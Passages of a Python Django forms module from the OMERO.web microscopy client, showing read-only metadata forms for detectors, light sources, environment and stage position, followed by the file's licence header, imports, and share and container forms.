                    required=False,
                )
            set_widget_attrs(self.fields["zoom"])
        except Exception:
            self.fields["zoom"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["zoom"])
        # Amplification gain
        try:
            if detector is not None:
                self.fields["amplificationGain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "amplificationGain"),
                        }
                    ),
                    initial=detector.amplificationGain,
                    label="Amplification gain",
                    required=False,
                )
            else:
                self.fields["amplificationGain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detector.id, "amplificationGain"),
                        }
                    ),
                    label="Amplification gain",
                    required=False,
                )
            set_widget_attrs(self.fields["amplificationGain"])
        except Exception:
            self.fields["amplificationGain"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Amplification gain",
                required=False,
            )
            set_widget_attrs(self.fields["amplificationGain"])
        # Read out rate
        try:
            if detSet is not None and detSet.readOutRate is not None:
                self.fields["readOutRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "readOutRate"),
                        }
                    ),
                    initial=detSet.readOutRate.getValue(),
                    label=("Read out rate (%s)" % detSet.readOutRate.getSymbol()),
                    required=False,
                )
            else:
                self.fields["readOutRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(detSet.id, "readOutRate"),
                        }
                    ),
                    label="Read out rate",
                    required=False,
                )
            set_widget_attrs(self.fields["readOutRate"])
        except Exception:
            self.fields["readOutRate"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Read out rate",
                required=False,
            )
            set_widget_attrs(self.fields["readOutRate"])
        # Binning
        try:
            if detSet is not None:
                self.fields["binning"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["binnings"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            # fix: was saved under "type" instead of "binning"
                            "onchange": save_metadata(detSet.id, "binning", options=True)
                        }
                    ),
                    initial=detSet.getBinning().value,
                    required=False,
                )
            else:
                self.fields["binning"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["binnings"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            # fix: was saved under "type" (see above)
                            "onchange": save_metadata(detSet.id, "binning", options=True)
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["binning"])
        except Exception:
            self.fields["binning"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["binning"])
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
            "gain",
            "voltage",
            "offsetValue",
            "zoom",
            "amplificationGain",
            "readOutRate",
            "binning",
        ]
class MetadataLightSourceForm(forms.Form):
    """
    Read-only metadata form for a light source (Laser, Arc, Filament, LED...)
    and, optionally, its per-channel LightSourceSettings.

    Every field follows the same pattern: try to build the field from the
    object's value (with an ``onchange`` JS handler that would save edits),
    fall back to a field without an initial value, and on any exception
    (e.g. the attribute is missing for this light-source type) fall back to
    a disabled "N/A" CharField.  All fields are disabled via
    ``set_widget_attrs`` — this form is display-only in practice.
    """

    BOOLEAN_CHOICES = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )

    def __init__(self, *args, **kwargs):
        super(MetadataLightSourceForm, self).__init__(*args, **kwargs)
        lightSource = kwargs["initial"]["lightSource"]
        lightSourceSettings = None
        if "lightSourceSettings" in kwargs["initial"]:
            lightSourceSettings = kwargs["initial"]["lightSourceSettings"]
        # OMERO class name (e.g. 'Laser') — used by templates to decide
        # which fields to display.
        self.lightSourceType = lightSource.OMERO_CLASS
        # Manufacturer
        try:
            if lightSource.manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fix: save to "manufacturer" (was "model",
                            # copy-pasted from the Model field below).
                            "onchange": save_metadata(lightSource.id, "manufacturer"),
                        }
                    ),
                    initial=lightSource.manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "manufacturer"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Model
        try:
            if lightSource.model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "model"),
                        }
                    ),
                    initial=lightSource.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "model"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Serial Number
        try:
            if lightSource.serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "serialNumber"),
                        }
                    ),
                    initial=lightSource.serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "serialNumber"),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot Number
        try:
            if lightSource.lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "lotNumber"),
                        }
                    ),
                    initial=lightSource.lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "lotNumber"),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Power
        try:
            if lightSource.power is not None:
                self.fields["power"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "power"),
                        }
                    ),
                    initial=lightSource.power.getValue(),
                    label="Power (%s)" % lightSource.power.getSymbol(),
                    required=False,
                )
            else:
                self.fields["power"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "power"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["power"])
        except Exception:
            self.fields["power"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["power"])
        # Type
        try:
            if lightSource.getLightSourceType() is not None:
                self.fields["lstype"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["lstypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "type", options=True
                            )
                        }
                    ),
                    label="Type",
                    initial=lightSource.getLightSourceType().value,
                    required=False,
                )
            else:
                self.fields["lstype"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["lstypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "type", options=True
                            )
                        }
                    ),
                    label="Type",
                    required=False,
                )
            set_widget_attrs(self.fields["lstype"])
        except Exception:
            self.fields["lstype"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Type",
                required=False,
            )
            set_widget_attrs(self.fields["lstype"])
        # Pump (laser only)
        try:
            # Will throw exception for non-Laser lightsources.
            pump = lightSource.getPump()
            pumpType = pump.OMERO_CLASS  # E.g. 'Arc'
            pumpModel = pump.getModel()
            pumpValue = "%s: %s" % (pumpType, pumpModel)
            self.fields["pump"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial=pumpValue,
                required=False,
            )
        except Exception:
            # Not a Laser - don't show Pump
            self.fields["pump"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
        set_widget_attrs(self.fields["pump"])
        # Medium
        try:
            if lightSource.getLaserMedium() is not None:
                self.fields["lmedium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "medium", options=True
                            )
                        }
                    ),
                    initial=lightSource.getLaserMedium().value,
                    label="Medium",
                    required=False,
                )
            else:
                self.fields["lmedium"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "medium", options=True
                            )
                        }
                    ),
                    label="Medium",
                    required=False,
                )
            set_widget_attrs(self.fields["lmedium"])
        except Exception:
            self.fields["lmedium"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Medium",
                required=False,
            )
            set_widget_attrs(self.fields["lmedium"])
        # Wavelength — prefer the per-channel settings value over the
        # light source's own wavelength.
        try:
            if (
                lightSourceSettings is not None
                and lightSourceSettings.wavelength is not None
            ):
                # NOTE(review): onchange saves via lightSource.id even though
                # the displayed value comes from lightSourceSettings — confirm
                # this is the intended save target.
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "wavelength"),
                        }
                    ),
                    initial=lightSourceSettings.wavelength.getValue(),
                    label=(
                        "Wavelength (%s)" % lightSourceSettings.wavelength.getSymbol()
                    ),
                    required=False,
                )
            elif lightSource.wavelength is not None:
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "wavelength"),
                        }
                    ),
                    initial=lightSource.wavelength.getValue(),
                    label=("Wavelength (%s)" % lightSource.wavelength.getSymbol()),
                    required=False,
                )
            else:
                self.fields["wavelength"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "wavelength"),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["wavelength"])
        except Exception:
            self.fields["wavelength"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["wavelength"])
        # FrequencyMultiplication
        try:
            if lightSource.frequencyMultiplication is not None:
                self.fields["frequencyMultiplication"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                lightSource.id, "frequencyMultiplication"
                            ),
                        }
                    ),
                    initial=lightSource.frequencyMultiplication,
                    label="Frequency Multiplication",
                    required=False,
                )
            else:
                self.fields["frequencyMultiplication"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                lightSource.id, "frequencyMultiplication"
                            ),
                        }
                    ),
                    label="Frequency Multiplication",
                    required=False,
                )
            set_widget_attrs(self.fields["frequencyMultiplication"])
        except Exception:
            self.fields["frequencyMultiplication"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Frequency Multiplication",
                required=False,
            )
            set_widget_attrs(self.fields["frequencyMultiplication"])
        # Tuneable
        try:
            if lightSource.tuneable is not None:
                self.fields["tuneable"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "tuneable", options=True
                            )
                        }
                    ),
                    initial=lightSource.tuneable,
                    required=False,
                )
            else:
                self.fields["tuneable"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "tuneable", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["tuneable"])
        except Exception:
            self.fields["tuneable"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["tuneable"])
        # Pulse
        try:
            if lightSource.pulse is not None:
                self.fields["pulse"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["pulses"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pulse", options=True
                            )
                        }
                    ),
                    initial=lightSource.pulse,
                    required=False,
                )
            else:
                self.fields["pulse"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["pulses"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pulse", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["pulse"])
        except Exception:
            self.fields["pulse"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["pulse"])
        # Repetition Rate
        try:
            if lightSource.repetitionRate is not None:
                self.fields["repetitionRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "repetitionRate"),
                        }
                    ),
                    initial=lightSource.repetitionRate.getValue(),
                    label=(
                        "Repetition rate (%s)" % lightSource.repetitionRate.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["repetitionRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(lightSource.id, "repetitionRate"),
                        }
                    ),
                    label="Repetition rate",
                    required=False,
                )
            set_widget_attrs(self.fields["repetitionRate"])
        except Exception:
            self.fields["repetitionRate"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Repetition rate",
                required=False,
            )
            set_widget_attrs(self.fields["repetitionRate"])
        # Pockel Cell
        try:
            if lightSource.pockelCell is not None:
                self.fields["pockelCell"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pockelCell", options=True
                            )
                        }
                    ),
                    initial=lightSource.pockelCell,
                    label="Pockel Cell",
                    required=False,
                )
            else:
                self.fields["pockelCell"] = forms.ChoiceField(
                    choices=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                lightSource.id, "pockelCell", options=True
                            )
                        }
                    ),
                    label="Pockel Cell",
                    required=False,
                )
            set_widget_attrs(self.fields["pockelCell"])
        except Exception:
            self.fields["pockelCell"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Pockel Cell",
                required=False,
            )
            set_widget_attrs(self.fields["pockelCell"])
        # Attenuation (stored as a fraction; displayed as a percentage)
        if (
            lightSourceSettings is not None
            and lightSourceSettings.attenuation is not None
        ):
            self.fields["attenuation"] = forms.CharField(
                max_length=100,
                widget=forms.TextInput(
                    attrs={
                        "size": 25,
                        "onchange": save_metadata(
                            lightSourceSettings.id, "attenuation"
                        ),
                    }
                ),
                initial=formatPercentFraction(lightSourceSettings.attenuation),
                label="Attenuation (%)",
                required=False,
            )
        else:
            self.fields["attenuation"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
        set_widget_attrs(self.fields["attenuation"])
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "power",
            "lstype",
            "pump",
            "lmedium",
            "wavelength",
            "frequencyMultiplication",
            "tuneable",
            "pulse",
            "repetitionRate",
            "pockelCell",
            "attenuation",
        ]
class MetadataEnvironmentForm(forms.Form):
    """
    Read-only metadata form showing the ImagingEnvironment of an image
    (temperature, air pressure, humidity, CO2).

    Each field is built from the environment value when available (with an
    ``onchange`` JS save handler), otherwise without an initial value; any
    exception while reading the value (e.g. the image has no
    ImagingEnvironment, so ``imagingEnv`` is None) yields a disabled "N/A"
    CharField instead.  All fields are disabled via ``set_widget_attrs``.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataEnvironmentForm, self).__init__(*args, **kwargs)
        # Imaging environment
        # May be None — the try/except blocks below rely on the resulting
        # AttributeError to fall back to the "N/A" fields.
        imagingEnv = kwargs["initial"]["image"].getImagingEnvironment()
        # Temperature
        try:
            if imagingEnv.temperature is not None:
                self.fields["temperature"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "temperature"
                            ),
                        }
                    ),
                    initial=imagingEnv.temperature.getValue(),
                    label=("Temperature (%s)" % imagingEnv.temperature.getSymbol()),
                    required=False,
                )
            else:
                self.fields["temperature"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "temperature"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["temperature"])
        except Exception:
            self.fields["temperature"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["temperature"])
        # Air Pressure
        try:
            if imagingEnv.airPressure is not None:
                self.fields["airPressure"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "airPressure"
                            ),
                        }
                    ),
                    initial=imagingEnv.airPressure.getValue(),
                    label=("Air Pressure (%s)" % imagingEnv.airPressure.getSymbol()),
                    required=False,
                )
            else:
                self.fields["airPressure"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "airPressure"
                            ),
                        }
                    ),
                    label="Air Pressure",
                    required=False,
                )
            set_widget_attrs(self.fields["airPressure"])
        except Exception:
            self.fields["airPressure"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                label="Air Pressure",
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["airPressure"])
        # Humidity
        try:
            if imagingEnv.humidity is not None:
                self.fields["humidity"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "humidity"
                            ),
                        }
                    ),
                    initial=imagingEnv.humidity,
                    required=False,
                )
            else:
                self.fields["humidity"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "humidity"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["humidity"])
        except Exception:
            self.fields["humidity"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["humidity"])
        # CO2 percent
        try:
            if imagingEnv.co2percent is not None:
                self.fields["co2percent"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "co2percent"
                            ),
                        }
                    ),
                    initial=imagingEnv.co2percent,
                    label="CO2 (%)",
                    required=False,
                )
            else:
                self.fields["co2percent"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "co2percent"
                            ),
                        }
                    ),
                    label="CO2 (%)",
                    required=False,
                )
            set_widget_attrs(self.fields["co2percent"])
        except Exception:
            self.fields["co2percent"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="CO2 (%)",
                required=False,
            )
            set_widget_attrs(self.fields["co2percent"])
        # Display order on the metadata panel.
        self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]
class MetadataStageLabelForm(forms.Form):
    """
    Read-only metadata form showing the stage label (X/Y/Z position) of an
    image.

    Each position field falls back to a disabled "N/A" CharField when the
    value cannot be read (e.g. ``getStageLabel()`` raises or the image is
    missing).  All fields are disabled via ``set_widget_attrs``.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataStageLabelForm, self).__init__(*args, **kwargs)
        # Stage label
        # Position x
        try:
            if kwargs["initial"]["image"].getStageLabel() is not None:
                self.fields["positionx"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "positionx"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["image"].getStageLabel().positionx,
                    label="Position X",
                    required=False,
                )
            else:
                self.fields["positionx"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "positionx"
                            ),
                        }
                    ),
                    label="Position X",
                    required=False,
                )
            set_widget_attrs(self.fields["positionx"])
        except Exception:
            self.fields["positionx"] = forms.CharField(
                max_length=100,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Position X",
                required=False,
            )
            set_widget_attrs(self.fields["positionx"])
        # Position y
        try:
            if kwargs["initial"]["image"].getStageLabel() is not None:
                self.fields["positiony"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "positiony"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["image"].getStageLabel().positiony,
                    label="Position Y",
                    required=False,
                )
            else:
                self.fields["positiony"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "positiony"
                            ),
                        }
                    ),
                    label="Position Y",
                    required=False,
                )
            set_widget_attrs(self.fields["positiony"])
        except Exception:
            self.fields["positiony"] = forms.CharField(
                max_length=100,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Position Y",
                required=False,
            )
            # Fix: disable the field that was just created — this previously
            # re-disabled "positionx", leaving the fallback Position Y field
            # enabled and unstyled.
            set_widget_attrs(self.fields["positiony"])
        # Position z
        try:
            if kwargs["initial"]["image"].getStageLabel() is not None:
                self.fields["positionz"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "positionz"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["image"].getStageLabel().positionz,
                    label="Position Z",
                    required=False,
                )
            else:
                self.fields["positionz"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["image"].id, "positionz"
                            ),
                        }
                    ),
                    label="Position Z",
                    required=False,
                )
            set_widget_attrs(self.fields["positionz"])
        except Exception:
            self.fields["positionz"] = forms.CharField(
                max_length=100,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Position Z",
                required=False,
            )
            set_widget_attrs(self.fields["positionz"])
        self.fields.keyOrder = ["positionx", "positiony", "positionz"]
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
#
# Copyright (c) 2008-2015 University of Dundee.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: Aleksandra Tarkowska <A(dot)Tarkowska(at)dundee(dot)ac(dot)uk>, 2008.
#
# Version: 1.0
#
import datetime
import time
import logging
from django.conf import settings
from django import forms
from django.forms.formsets import formset_factory
from django.core.urlresolvers import reverse
from omeroweb.custom_forms import NonASCIIForm
from .custom_forms import MetadataModelChoiceField
from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction
logger = logging.getLogger(__name__)
##################################################################
# Static values

# TODO: change to reverse
# URL of the 16px help icon served from webgateway's static files.
help_button = "%swebgateway/img/help16.png" % settings.STATIC_URL

# Tooltip markup shown next to the share "enable" checkbox.
help_enable = (
    '<span class="tooltip" title="Enable/Disable: This option'
    ' allows the owner to keep the access control of the share.">'
    '<img src="%s" /></span>'
) % help_button

# Tooltip markup shown next to the share expiry-date input.
help_expire = (
    '<span class="tooltip" title="Expiry date: This date defines'
    " when the share will stop being available. Date format:"
    ' YYYY-MM-DD."><img src="%s" /></span>'
) % help_button
#################################################################
# Non-model Form
class GlobalSearchForm(NonASCIIForm):
    """Single-field form holding the free-text query for global search."""

    search_query = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class ShareForm(NonASCIIForm):
    """
    Form for creating/editing a share: message, expiry date, enabled flag
    and the list of member experimenters.
    """

    def __init__(self, *args, **kwargs):
        super(ShareForm, self).__init__(*args, **kwargs)

        # Pre-select current members when supplied; any lookup failure
        # (e.g. missing "shareMembers" key) falls back to an unselected list.
        try:
            current_members = kwargs["initial"]["shareMembers"]
            if current_members:
                pass
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=kwargs["initial"]["experimenters"],
                initial=current_members,
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        except Exception:
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=kwargs["initial"]["experimenters"],
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        self.fields.keyOrder = [
            "message",
            "expiration",
            "enable",
            "members",
        ]  # , 'guests']

    message = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
    expiration = forms.CharField(
        max_length=100,
        widget=forms.TextInput(attrs={"size": 10}),
        label="Expiry date",
        help_text=help_expire,
        required=False,
    )
    enable = forms.BooleanField(required=False, help_text=help_enable)
    # guests = MultiEmailField(required=False,
    #     widget=forms.TextInput(attrs={'size':75}))

    def clean_expiration(self):
        """Validate expiry: empty -> None; otherwise YYYY-MM-DD, in the future."""
        raw = self.cleaned_data["expiration"]
        if raw is not None and len(raw) < 1:
            return None
        if raw is not None:
            parts = str(raw).rsplit("-")
            try:
                parsed = datetime.datetime.strptime(
                    ("%s-%s-%s" % (parts[0], parts[1], parts[2])), "%Y-%m-%d"
                )
            except Exception:
                raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
            if time.mktime(parsed.timetuple()) <= time.time():
                raise forms.ValidationError("Expiry date must be in the future.")
        return self.cleaned_data["expiration"]
class ContainerForm(NonASCIIForm):
    """Name/description form for creating or editing a container."""

    name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
    description = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
    )
    # Hidden owner field, populated by the view rather than the user.
    owner = forms.CharField(widget=forms.HiddenInput, required=False)
class ContainerNameForm(NonASCIIForm):
    """Single-field form for renaming a container."""

    name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class ContainerDescriptionForm(NonASCIIForm):
    """Single-field form for editing a container's description."""

    description = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
    )
class BaseAnnotationForm(NonASCIIForm):
    """
    This is the superclass of the various forms used for annotating single or
    multiple objects.

    All these forms use hidden fields to specify the object(s) currently being
    annotated.  For each object type present (and non-empty) in
    ``kwargs["initial"]``, a multiple-choice field named after the singular
    form is added; when the list of selected ids is available under
    ``initial["selected"]`` it is used as the field's initial value, otherwise
    the field is created unselected.
    """

    # (plural key in kwargs["initial"], singular field name) for every
